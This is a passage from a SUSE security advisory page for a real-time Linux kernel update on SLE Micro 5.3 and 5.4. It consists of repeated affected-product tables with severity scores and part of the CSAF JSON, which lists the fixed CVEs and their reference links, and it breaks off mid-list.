| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.5 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
low
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.3 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
5.9 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
7.1 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
6.1 (Medium)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
References
203 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 15 SP4 RT kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2024-46854: net: dpaa: Pad packets to ETH_ZLEN (bsc#1231084).\n- CVE-2025-21738: ata: libata-sff: Ensure that we cannot write outside the allocated buffer (bsc#1238917).\n- CVE-2025-40242: gfs2: Fix unlikely race in gdlm_put_lock (bsc#1255075).\n- CVE-2025-68312: usbnet: Prevents free active kevent (bsc#1255171).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n (bsc#1256645).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23004: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() (bsc#1257231).\n- CVE-2026-23060: crypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec (bsc#1257735).\n- CVE-2026-23074: net/sched: Enforce that teql can only be used as root qdisc (bsc#1257749).\n- CVE-2026-23089: ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (bsc#1257790).\n- CVE-2026-23191: ALSA: aloop: Fix racy access at PCM trigger (bsc#1258395).\n- CVE-2026-23204: net: add skb_header_pointer_careful() helper (bsc#1258340).\n- CVE-2026-23209: macvlan: fix error recovery in macvlan_common_newlink() (bsc#1258518).\n- CVE-2026-23268: apparmor: fix unprivileged local user can do privileged policy management (bsc#1258850).\n- CVE-2026-23269: apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1259857).\n\nThe following non security issues were fixed:\n\n- apparmor: fix differential encoding verification (bsc#1258849).\n- apparmor: Fix double free of ns_name in aa_replace_profiles() (bsc#1258849).\n- apparmor: fix memory leak in verify_header (bsc#1258849).\n- apparmor: fix missing bounds check on DEFAULT table in verify_dfa() (bsc#1258849).\n- apparmor: fix race between freeing data and fs accessing it (bsc#1258849).\n- apparmor: fix race on rawdata dereference (bsc#1258849).\n- apparmor: fix side-effect bug in match_char() macro usage (bsc#1258849).\n- apparmor: fix unprivileged local user can do privileged policy management (bsc#1258849).\n- apparmor: fix: limit the number of levels of policy namespaces (bsc#1258849).\n- apparmor: replace recursive profile removal with iterative approach (bsc#1258849).\n- apparmor: validate DFA start states are in bounds in unpack_pdb (bsc#1258849).\n- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).\n- net: tcp: allow zero-window ACK update the window (bsc#1254767).\n- net: tcp: send zero-window ACK when no memory (bsc#1254767).\n- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).\n- tcp: correct handling of extreme memory squeeze (bsc#1254767).\n- x86/its: Fix crash during dynamic its initialization (bsc#1257771).\n- x86/modules: Set VM_FLUSH_RESET_PERMS in module_alloc() (bsc#1257771).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1131,SUSE-SLE-Micro-5.3-2026-1131,SUSE-SLE-Micro-5.4-2026-1131",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1131-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1131-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261131-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1131-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-March/045154.html"
},
{
"category": "self",
"summary": "SUSE Bug 1220137",
"url": "https://bugzilla.suse.com/1220137"
},
{
"category": "self",
"summary": "SUSE Bug 1220144",
"url": "https://bugzilla.suse.com/1220144"
},
{
"category": "self",
"summary": "SUSE Bug 1223007",
"url": "https://bugzilla.suse.com/1223007"
},
{
"category": "self",
"summary": "SUSE Bug 1231084",
"url": "https://bugzilla.suse.com/1231084"
},
{
"category": "self",
"summary": "SUSE Bug 1233038",
"url": "https://bugzilla.suse.com/1233038"
},
{
"category": "self",
"summary": "SUSE Bug 1235905",
"url": "https://bugzilla.suse.com/1235905"
},
{
"category": "self",
"summary": "SUSE Bug 1236104",
"url": "https://bugzilla.suse.com/1236104"
},
{
"category": "self",
"summary": "SUSE Bug 1236208",
"url": "https://bugzilla.suse.com/1236208"
},
{
"category": "self",
"summary": "SUSE Bug 1237885",
"url": "https://bugzilla.suse.com/1237885"
},
{
"category": "self",
"summary": "SUSE Bug 1237906",
"url": "https://bugzilla.suse.com/1237906"
},
{
"category": "self",
"summary": "SUSE Bug 1238414",
"url": "https://bugzilla.suse.com/1238414"
},
{
"category": "self",
"summary": "SUSE Bug 1238754",
"url": "https://bugzilla.suse.com/1238754"
},
{
"category": "self",
"summary": "SUSE Bug 1238763",
"url": "https://bugzilla.suse.com/1238763"
},
{
"category": "self",
"summary": "SUSE Bug 1238917",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "self",
"summary": "SUSE Bug 1244758",
"url": "https://bugzilla.suse.com/1244758"
},
{
"category": "self",
"summary": "SUSE Bug 1244904",
"url": "https://bugzilla.suse.com/1244904"
},
{
"category": "self",
"summary": "SUSE Bug 1245110",
"url": "https://bugzilla.suse.com/1245110"
},
{
"category": "self",
"summary": "SUSE Bug 1248306",
"url": "https://bugzilla.suse.com/1248306"
},
{
"category": "self",
"summary": "SUSE Bug 1248377",
"url": "https://bugzilla.suse.com/1248377"
},
{
"category": "self",
"summary": "SUSE Bug 1249156",
"url": "https://bugzilla.suse.com/1249156"
},
{
"category": "self",
"summary": "SUSE Bug 1249158",
"url": "https://bugzilla.suse.com/1249158"
},
{
"category": "self",
"summary": "SUSE Bug 1249827",
"url": "https://bugzilla.suse.com/1249827"
},
{
"category": "self",
"summary": "SUSE Bug 1252785",
"url": "https://bugzilla.suse.com/1252785"
},
{
"category": "self",
"summary": "SUSE Bug 1253028",
"url": "https://bugzilla.suse.com/1253028"
},
{
"category": "self",
"summary": "SUSE Bug 1253409",
"url": "https://bugzilla.suse.com/1253409"
},
{
"category": "self",
"summary": "SUSE Bug 1254462",
"url": "https://bugzilla.suse.com/1254462"
},
{
"category": "self",
"summary": "SUSE Bug 1254463",
"url": "https://bugzilla.suse.com/1254463"
},
{
"category": "self",
"summary": "SUSE Bug 1254464",
"url": "https://bugzilla.suse.com/1254464"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1255075",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "self",
"summary": "SUSE Bug 1255171",
"url": "https://bugzilla.suse.com/1255171"
},
{
"category": "self",
"summary": "SUSE Bug 1256623",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "self",
"summary": "SUSE Bug 1256645",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "self",
"summary": "SUSE Bug 1256726",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1257231",
"url": "https://bugzilla.suse.com/1257231"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257732",
"url": "https://bugzilla.suse.com/1257732"
},
{
"category": "self",
"summary": "SUSE Bug 1257735",
"url": "https://bugzilla.suse.com/1257735"
},
{
"category": "self",
"summary": "SUSE Bug 1257749",
"url": "https://bugzilla.suse.com/1257749"
},
{
"category": "self",
"summary": "SUSE Bug 1257771",
"url": "https://bugzilla.suse.com/1257771"
},
{
"category": "self",
"summary": "SUSE Bug 1257790",
"url": "https://bugzilla.suse.com/1257790"
},
{
"category": "self",
"summary": "SUSE Bug 1258340",
"url": "https://bugzilla.suse.com/1258340"
},
{
"category": "self",
"summary": "SUSE Bug 1258395",
"url": "https://bugzilla.suse.com/1258395"
},
{
"category": "self",
"summary": "SUSE Bug 1258518",
"url": "https://bugzilla.suse.com/1258518"
},
{
"category": "self",
"summary": "SUSE Bug 1258849",
"url": "https://bugzilla.suse.com/1258849"
},
{
"category": "self",
"summary": "SUSE Bug 1258850",
"url": "https://bugzilla.suse.com/1258850"
},
{
"category": "self",
"summary": "SUSE Bug 1259857",
"url": "https://bugzilla.suse.com/1259857"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-49604 page",
"url": "https://www.suse.com/security/cve/CVE-2022-49604/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-49943 page",
"url": "https://www.suse.com/security/cve/CVE-2022-49943/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-49980 page",
"url": "https://www.suse.com/security/cve/CVE-2022-49980/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50232 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50232/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-52433 page",
"url": "https://www.suse.com/security/cve/CVE-2023-52433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-52923 page",
"url": "https://www.suse.com/security/cve/CVE-2023-52923/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53178 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53407 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53407/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53412 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53412/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53417 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53418 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53418/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26581 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-26832 page",
"url": "https://www.suse.com/security/cve/CVE-2024-26832/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-46854 page",
"url": "https://www.suse.com/security/cve/CVE-2024-46854/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-50143 page",
"url": "https://www.suse.com/security/cve/CVE-2024-50143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54031 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54031/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21658 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21658/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21760 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21760/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21765 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21765/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21766 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21766/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38563 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38563/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38565 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38565/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38684 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38684/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40044 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40044/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40139 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40139/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40242 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40242/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68312 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68312/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23004 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23004/"
},
{
"category": "self",
